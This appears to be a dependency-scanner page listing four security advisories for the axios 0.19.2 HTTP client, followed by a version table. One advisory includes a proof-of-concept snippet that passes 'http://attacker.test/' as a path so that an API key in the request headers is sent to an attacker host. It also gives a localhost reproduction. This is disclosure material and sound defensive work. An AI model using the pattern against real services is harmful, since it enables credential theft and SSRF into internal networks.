NodeJS/axios/0.19.2
Promise based HTTP client for the browser and node.js
https://www.npmjs.com/package/axios
MIT
4 Security Vulnerabilities
Axios vulnerable to Server-Side Request Forgery
- https://nvd.nist.gov/vuln/detail/CVE-2020-28168
- https://github.com/advisories/GHSA-4w2v-q235-vp99
- https://github.com/axios/axios/issues/3369
- https://github.com/axios/axios/commit/c7329fefc890050edd51e40e469a154d0117fc55
- https://snyk.io/vuln/SNYK-JS-AXIOS-1038255
- https://www.npmjs.com/package/axios
- https://www.npmjs.com/advisories/1594
- https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
axios Inefficient Regular Expression Complexity vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2021-3749
- https://github.com/advisories/GHSA-cph5-m8f7-6c5x
- https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929
- https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31
- https://www.npmjs.com/package/axios
- https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E
- https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
- https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
- https://github.com/axios/axios/issues/6463
- https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
- https://github.com/axios/axios/releases/tag/v1.8.2
- https://nvd.nist.gov/vuln/detail/CVE-2025-27152
- https://github.com/advisories/GHSA-jr5f-v2jv-69x6
- https://github.com/axios/axios/pull/6829
- https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde
Summary
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL
is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Details
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/
instead of the baseURL
. As a result, the domain owner of attacker.test
would receive the X-API-KEY
included in the request headers.
It is recommended that:
- When
baseURL
is set, passing an absolute URL such ashttp://attacker.test/
toget()
should not ignorebaseURL
. - Before sending the HTTP request (after combining the
baseURL
with the user-provided parameter), axios should verify that the resulting URL still begins with the expectedbaseURL
.
PoC
Follow the steps below to reproduce the issue:
- Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
- Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
- Run the script:
$ node main.js
this is server2
Even though baseURL
is set to http://localhost:10001/
, axios sends the request to http://localhost:10002/
.
Impact
- Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
- SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
- Affected Users: Software that uses
baseURL
and does not validate path parameters is affected by this issue.
Axios Cross-Site Request Forgery Vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-45857
- https://github.com/axios/axios/issues/6006
- https://github.com/axios/axios/issues/6022
- https://github.com/axios/axios/pull/6028
- https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0
- https://github.com/axios/axios/releases/tag/v1.6.0
- https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459
- https://github.com/advisories/GHSA-wf5p-g6vw-rhxx
- https://github.com/axios/axios/pull/6091
- https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967
- https://github.com/axios/axios/releases/tag/v0.28.0
- https://security.netapp.com/advisory/ntap-20240621-0006
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
115 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
1.10.0 | MIT | 2025-06-14 - 12:11 | 22 days | |
1.9.0 | MIT | 2025-04-24 - 20:18 | 2 months | |
1.8.4 | MIT | 2025-03-19 - 19:27 | 4 months | |
1.8.3 | MIT | 2025-03-12 - 07:24 | 4 months | |
1.8.2 | MIT | 2025-03-07 - 07:41 | 4 months | |
1.8.1 | MIT | 1 | 2025-02-26 - 09:07 | 4 months |
1.8.0 | MIT | 1 | 2025-02-26 - 06:01 | 4 months |
1.7.9 | MIT | 1 | 2024-12-04 - 07:38 | 7 months |
1.7.8 | MIT | 1 | 2024-11-25 - 21:13 | 7 months |
1.7.7 | MIT | 1 | 2024-08-31 - 22:02 | 10 months |
1.7.6 | MIT | 1 | 2024-08-30 - 19:56 | 10 months |
1.7.5 | MIT | 1 | 2024-08-23 - 13:32 | 11 months |
1.7.4 | MIT | 1 | 2024-08-13 - 19:33 | 11 months |
1.7.3 | MIT | 2 | 2024-08-01 - 16:16 | 11 months |
1.7.2 | MIT | 2 | 2024-05-21 - 16:58 | about 1 year |
1.7.1 | MIT | 2 | 2024-05-20 - 13:32 | about 1 year |
1.7.0 | MIT | 2 | 2024-05-19 - 20:25 | about 1 year |
1.7.0-beta.2 | MIT | 2 | 2024-05-19 - 18:01 | about 1 year |
1.7.0-beta.1 | MIT | 2 | 2024-05-07 - 18:37 | about 1 year |
1.7.0-beta.0 | MIT | 2 | 2024-04-28 - 19:50 | about 1 year |
1.6.8 | MIT | 2 | 2024-03-15 - 16:32 | over 1 year |
1.6.7 | MIT | 2 | 2024-01-25 - 19:58 | over 1 year |
1.6.6 | MIT | 2 | 2024-01-24 - 23:12 | over 1 year |
1.6.5 | MIT | 2 | 2024-01-05 - 19:52 | over 1 year |
1.6.4 | MIT | 2 | 2024-01-03 - 22:10 | over 1 year |
1.6.3 | MIT | 2 | 2023-12-26 - 23:16 | over 1 year |
1.6.2 | MIT | 2 | 2023-11-14 - 20:36 | over 1 year |
1.6.1 | MIT | 2 | 2023-11-08 - 15:09 | over 1 year |
1.6.0 | MIT | 2 | 2023-10-26 - 21:15 | over 1 year |
1.5.1 | MIT | 3 | 2023-09-26 - 18:22 | almost 2 years |
1.5.0 | MIT | 3 | 2023-08-26 - 19:10 | almost 2 years |
1.4.0 | MIT | 3 | 2023-04-27 - 23:05 | about 2 years |
1.3.6 | MIT | 3 | 2023-04-19 - 19:38 | about 2 years |
1.3.5 | MIT | 3 | 2023-04-05 - 18:03 | over 2 years |
1.3.4 | MIT | 3 | 2023-02-22 - 21:06 | over 2 years |
1.3.3 | MIT | 3 | 2023-02-13 - 18:47 | over 2 years |
1.3.2 | MIT | 3 | 2023-02-03 - 18:10 | over 2 years |
1.3.1 | MIT | 2 | 2023-02-01 - 23:31 | over 2 years |
1.3.0 | MIT | 2 | 2023-01-31 - 16:55 | over 2 years |
1.2.6 | MIT | 2 | 2023-01-28 - 16:41 | over 2 years |
1.2.5 | MIT | 2 | 2023-01-26 - 15:06 | over 2 years |
1.2.4 | MIT | 2 | 2023-01-24 - 17:21 | over 2 years |
1.2.3 | MIT | 2 | 2023-01-17 - 17:56 | over 2 years |
1.2.2 | MIT | 2 | 2022-12-29 - 06:38 | over 2 years |
1.2.1 | MIT | 2 | 2022-12-05 - 19:39 | over 2 years |
1.2.0 | MIT | 2 | 2022-11-22 - 19:06 | over 2 years |
1.2.0-alpha.1 | MIT | 2 | 2022-11-10 - 19:06 | over 2 years |
1.1.3 | MIT | 2 | 2022-10-15 - 13:42 | over 2 years |
1.1.2 | MIT | 2 | 2022-10-07 - 10:14 | over 2 years |
1.1.1 | MIT | 2 | 2022-10-07 - 09:15 | over 2 years |